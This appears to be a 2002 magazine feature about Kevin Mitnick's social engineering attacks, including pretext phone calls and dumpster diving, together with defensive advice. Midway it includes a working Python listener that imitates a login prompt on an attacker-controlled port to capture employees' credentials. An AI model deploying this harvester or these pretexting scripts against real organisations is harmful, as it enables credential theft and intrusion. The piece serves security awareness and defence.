When famed hacker Kevin Mitnick wanted to break into the systems that run telecom operator Sprint’s backbone network, he did not bother running a sophisticated technical attack. Instead, his first move was to pick up the phone and simply ring the company direct.
Posing as a Nortel service engineer, Mitnick persuaded Sprint staff to hand over dial-in numbers, log-in names and passwords to the telephone company’s switches so that the ‘Nortel engineer’ he was posing as could perform routine remote maintenance on the equipment. Armed with that information, Mitnick says that he was able to dial into Sprint’s network and manipulate phone lines at will.
“A lot of people think they are not gullible, that they can’t be manipulated. But nothing could be further from the truth,” says Mitnick. “I used such tactics to get information and compromise computer systems and networks.” That is something of an understatement.
Mitnick earned notoriety in the 1980s and 1990s for seemingly being able to break into telephone and computer systems across the world at will. He stole software from Santa Cruz Operation, Digital Equipment and Sun Microsystems, including an in-development copy of the source code to Sun’s Solaris operating system. He accessed the North American Aerospace Defense Command (NORAD) computer systems and broke his way into the Pentagon. He was arrested six times, and his final capture resulted in a five-year jail term – the heaviest sentence ever handed down for a hacker.
Since his release in January 2000, Mitnick, 38, has ‘gone straight’ as a security consultant specialising in ‘social engineering’ techniques – a hacking approach that many organisations have failed to appreciate. As such, he is in a position to deliver some valuable lessons on how many hackers really penetrate systems.
Social engineering
The Sprint hack was just one of many perpetrated by Mitnick using a combination of technical skills and ‘social engineering’ – the art of manipulating people into divulging information about their systems that can provide the pass-key for an attack.
For hackers, private investigators and industrial spies, the technique is compelling. Why go through the tedious process of ‘war-dialling’ for an insecure port on an organisation’s network, or try to brute-force a password – activities that might arouse suspicion – when, through a mix of technical knowledge and confidence trickery, an employee can often simply be persuaded to disclose a legitimate log-in name and password?
It is a skill that exploits innate psychological principles, says Mitnick. “All of us make mental shortcuts depending on who we think is making the request and the reason for the request. We don’t really analyse the identity of the person and whether they are authorised,” he says.
Exploiting fear of authority is a common tactic: Attackers will frequently pretend that they are acting on behalf of the boss and the target will feel that they have to comply – particularly as many executives demand that short-cuts be made for them when they want something done.
Reciprocity is also effective. “You call somebody up under the guise of helping them, help them with something regardless of whether they want the help or not, then the victim feels obligated to reciprocate,” says Mitnick.
To do this, a social engineer might cause a fault, such as persuading somebody in the IT department to shut down the port that connects his target employee’s PC to the Internet.
When he calls the target posing as someone from IT support just minutes later, the attacker can gain trust by ‘helping’ to restore the connection.
He might also pick up the target’s user name and password in the process. “‘We are having problems with the system. Can you try changing your password to test123? Can you change it back?’ As soon as the attacker knows the password for a split second, he is in,” says Mitnick.
Alternatively, an attacker might call a relatively IT-literate member of staff, who will be bowled over at being asked to help the IT department. But when they are persuaded to try logging into a system via a certain Internet protocol (IP) address, for example, they may not be smart enough to realise that they are connecting to a port on a machine outside the organisation’s network, a port that is controlled by the attacker.
Obviously, the log-in attempt fails, but the attacker gets what he wanted: The user name and password of the target, which he can use to break into the organisation’s systems. The target, meanwhile, does not realise that he has been manipulated into giving away such critical information.
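To make the mechanics concrete, here is a minimal sketch, in Python and purely for illustration, of the kind of listener an attacker might run on that outside machine; the port number and prompts are hypothetical, not drawn from any real attack. Whatever the helpful employee types at the fake prompt is recorded, and the ‘failed’ log-in keeps the ruse intact.

    # Hypothetical sketch: an attacker-controlled listener that mimics a
    # log-in prompt and records whatever credentials are typed at it.
    import socket

    HOST, PORT = "0.0.0.0", 2323  # hypothetical port the victim is told to connect to

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((HOST, PORT))
        server.listen(1)
        conn, addr = server.accept()
        with conn:
            conn.sendall(b"login: ")
            username = conn.recv(1024).decode(errors="replace").strip()
            conn.sendall(b"Password: ")
            password = conn.recv(1024).decode(errors="replace").strip()
            # Reject the attempt so the ruse stays plausible; the
            # credentials have already been captured.
            conn.sendall(b"Login incorrect\r\n")
            print(f"Captured from {addr[0]}: {username!r} / {password!r}")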
Sting
Such examples are not made up. They illustrate real attacks carried out by Mitnick or his associates when he was a hacker or private investigator. Today, he makes his living as a security consultant, warning organisations of the dangers of people like him – and worse.
A typical attack may have two stages: The first is to gain information to use in the second stage, when the sting is carried out. In the first stage, acting stupid is enough to glean all the information that an attacker needs. ‘Hi, this is Tony in payroll. We just put through your request to have your pay cheque directly deposited to your Citibank account’.
At the other end of the phone, the target protests that no such request was ever made and, besides, he does not even have a Citibank account. To check, ‘Tony in payroll’ asks for his employee number, before confirming that he has indeed made a mistake.
But while the target considers his payroll number to be innocuous, the attacker can use it to authenticate himself to the systems administrator who sets up dial-in accounts for remote workers, such as sales people in the field.
“I understand this exact ruse was worked on one of the largest computer software manufacturers in the world,” says Mitnick. “You would think the systems administrators in such a company would be trained to detect such an attack,” he adds.
“I think the threat of social engineering is substantial. People ought to know that you can buy the best technology in the world and it won’t protect the organisation against social engineering,” says Mitnick.
The reformed hacker says that companies must adopt a strategy to tighten up this neglected area of security. First, this should include training to alert staff at all levels to the threat posed by social engineers. For example, staff at telecoms companies often take calls from private investigators seeking information about people with ex-directory numbers.
Mitnick, of course, found an easier way. “I even social engineered BT. I used to get ex-directory numbers because I found out that an employee could access [the relevant] computer and all they needed was their sign-in code. So I talked an employee into divulging their sign-in code,” says Mitnick.
In addition, IT directors need to take a second look at some of the software they run and re-write it so that certain security policies are enforced – for example, forcing employees to choose more complex passwords, or making sure that these are changed on a more regular basis.
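As a sketch of what such an enforced policy might look like, the following Python fragment checks a candidate password against one hypothetical rule set – at least 12 characters, mixing upper case, lower case, digits and punctuation. The thresholds are assumptions chosen for illustration, not a standard.

    # Hypothetical password-complexity check; the thresholds below are
    # illustrative, not an established policy.
    import re

    def password_is_acceptable(candidate: str) -> bool:
        """Return True if the candidate meets the assumed policy."""
        if len(candidate) < 12:
            return False
        required = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"]
        return all(re.search(pattern, candidate) for pattern in required)

    print(password_is_acceptable("test123"))          # False: too short, too simple
    print(password_is_acceptable("Tr4ff1c-l1ght!9"))  # True under this policy

Notably, ‘test123’ – the very password Mitnick’s ruse relies on – would fail such a check, though no complexity rule protects a password once its owner has been talked into revealing it.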
Finally, organisations also need to be more careful about what they throw out, shredding anything that an outsider could use to authenticate themselves as a valid employee in a social engineering-based attack.
“A social engineer needs to understand the corporate culture, the corporate structure, the organisational chart, who has access to what information, where in the company that information resides,” says Mitnick.
And much of that information can be found by ‘dumpster diving’ in the company waste bins: fishing out discarded floppy disks, old company manuals, memos, phone lists, directories and even password lists, says Mitnick.
Are most companies so foolish as to make such sensitive information so easily accessible? Absolutely, Mitnick concludes.
Information Age will be reviewing Kevin Mitnick’s new book, The Art of Deception, in the October 2002 issue.